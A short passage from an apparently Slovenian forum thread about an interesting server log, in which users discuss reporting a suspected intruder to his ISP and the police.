bosstjann :: 3. jan 2003, 14:43

kako ga pa prijaviš pa kakšna kazen je največ možna?

TheHijacker :: 3. jan 2003, 15:50

Prijavili smo ga njegovemu ISP-ju, od katerega smo dobili odgovor, da so mu ukinili račun ina posredovali podatek policiji... Čakamo na razplet...

http://www.google.si

Vredno ogleda ...

	Tema	Sporočila	Ogledi	Zadnje sporočilo
	Tema	Sporočila	Ogledi	Zadnje sporočilo
»	IIS 6.0 LOG Sims Oddelek: Operacijski sistemi	5	943 (914)	Mr.B 12. nov 2003 12:21:33
»	IIS5.1 problem v XPjih Yeznick Oddelek: Izdelava spletišč	5	984 (896)	rap3r 2. nov 2003 16:46:43
»	apache error log Seadoo Oddelek: Izdelava spletišč	8	1418 (1332)	Seadoo 13. feb 2003 09:57:28
»	nekdo mi vdira notr (strani: 1 2 ) eland Oddelek: Omrežja in internet	61	5276 (4281)	undefined 29. dec 2001 18:31:20
⊘	Prosim za pomoč pri testiranju delovanju strežnika,... SLOWWWeb.net Oddelek: Omrežja in internet	43	1994 (1550)	SLOWWWeb.net 15. okt 2001 09:48:23

Več podobnih tem

Zadnje novice

Zadnji članki

Išči:

Forum » Omrežja in internet »
Zanimiv server LOG

Zanimiv server LOG